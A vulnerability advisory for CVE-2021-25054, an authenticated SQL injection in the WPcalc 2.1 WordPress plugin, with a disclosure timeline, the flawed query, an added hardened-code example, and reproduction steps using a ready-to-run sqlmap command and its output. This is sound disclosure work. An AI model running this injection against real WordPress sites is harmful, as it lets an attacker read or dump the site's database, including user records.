CVE-2021-25054 SQL Injection vulnerability in WPcalc 2.1 WordPress Plugin

CVE-2021-25054

CVSS 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)


https://wordpress.org/plugins/wpcalc/

https://wpscan.com/vulnerability/200969eb-e2a4-4200-82d7-0c313de089af

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25054

Disclosure Timeline

Dec 5, 2021: Issue Identified and Disclosed to WPscan
Dec 5, 2021: Got auto reply
Dec 7, 2021: Got update that vendor had been contacted, CVE Assigned CVE-2021-25054
Dec 9, 2021: Plugin closed permanently
Jan 10, 2022: CVE published in NVD
Jan 14, 2022: CVE updated with score

Description:

The WPcalc WordPress plugin does not sanitize user input passed in the 'did' parameter and concatenates it directly into a SQL statement, leading to an authenticated SQL Injection.

We can see the problematic code in \admin\partials\main.php

[Screenshot of the source: on the "del" action the handler reads the request value into $delid and builds the query by string concatenation, "delete from " . $data . " where id=" . $delid, then outputs "<div class='updated' ... " with the message __("Record Deleted", "wow-fp-lang").]

This vulnerability is present in the current version of the plugin 2.1. Administrative access is required to access the vulnerable functionality.
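The following is an added illustration, not code from the WPcalc plugin: it places the concatenation pattern described above next to a hardened handler that uses WordPress's $wpdb->prepare(), a capability check and a nonce. The table name, option names and nonce action ('wpcalc_delete') are assumptions made for the example.

```php
<?php
// Added example (not the plugin's code). Table/nonce names are assumptions.

// --- Vulnerable pattern, as described in the advisory ---
function wpcalc_delete_vulnerable( $data ) {
    global $wpdb;
    // 'did' comes straight from the request, unvalidated
    $delid = $_GET['did'];
    // Concatenation: the request value becomes part of the SQL grammar,
    // so a crafted 'did' changes the statement instead of the id.
    $wpdb->query( "delete from " . $data . " where id=" . $delid );
    return "<div class='updated'><p>" . __( "Record Deleted", "wow-fp-lang" ) . "</p></div>";
}

// --- Hardened version ---
function wpcalc_delete_hardened() {
    global $wpdb;

    // 1. Only administrators may delete; admin pages alone do not enforce this.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'Insufficient privileges', 'wow-fp-lang' ) );
    }

    // 2. CSRF protection: the delete link must carry a nonce
    //    (generated with wp_nonce_url( $url, 'wpcalc_delete' ) when rendering the list).
    check_admin_referer( 'wpcalc_delete' );

    // 3. Validate the id as a non-negative integer; anything else becomes 0 and is rejected.
    $delid = isset( $_GET['did'] ) ? absint( wp_unslash( $_GET['did'] ) ) : 0;
    if ( 0 === $delid ) {
        wp_die( esc_html__( 'Invalid record id', 'wow-fp-lang' ) );
    }

    // 4. The table name is fixed by the plugin, never taken from the request.
    $table = $wpdb->prefix . 'wpcalc'; // assumed table name

    // 5. Bind the id as an integer placeholder; $wpdb->prepare() handles quoting.
    $deleted = $wpdb->query(
        $wpdb->prepare( "DELETE FROM {$table} WHERE id = %d", $delid )
    );

    if ( false === $deleted ) {
        return "<div class='error'><p>" . esc_html__( 'Delete failed', 'wow-fp-lang' ) . "</p></div>";
    }
    return "<div class='updated'><p>" . esc_html__( 'Record Deleted', 'wow-fp-lang' ) . "</p></div>";
}
```

With the hardened handler, the request captured in the steps below no longer reaches the database with attacker-controlled SQL: a non-numeric 'did' is rejected before any query runs, and a numeric one is bound as a value rather than spliced into the statement.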

Link to plugin:

https://wordpress.org/plugins/wpcalc/

Steps to reproduce:

1. Log into WordPress as the admin user

2. Install the WPcalc plugin

3. In the WPcalc plugin settings create and publish a new calc.

[Screenshot: WPcalc > Add new, creating a calc named "FAQ" with a single number input field (Field 1, width 12/12, value 1), then Publish/Save; the page displays the generated shortcode [WPcalc id=].]

4. Click the Delete link, then capture and save the request in an intercepting proxy.

[Screenshot: WPcalc > List showing the calc "FAQ" (ID 2, shortcode [WPcalc id=2]) with its Edit, Delete and Duplicate links.]

5. Save the request to a file, request.txt

6. Run sqlmap

sqlmap -r request.txt --dbms=mysql --current-user -b -p did --batch --flush-session

[Screenshot of sqlmap output: after accepting the prompt to optimize value(s) for DBMS delay responses (option '--time-sec'), sqlmap reports web application technology: Nginx 1.16.0, PHP 7.3.5; back-end DBMS: MySQL (banner '8.0.16'); current user: 'root@localhost'; fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/test0.local'.]

Using this technique, we can also (slowly) dump the entire contents of the database, including WordPress users and so on.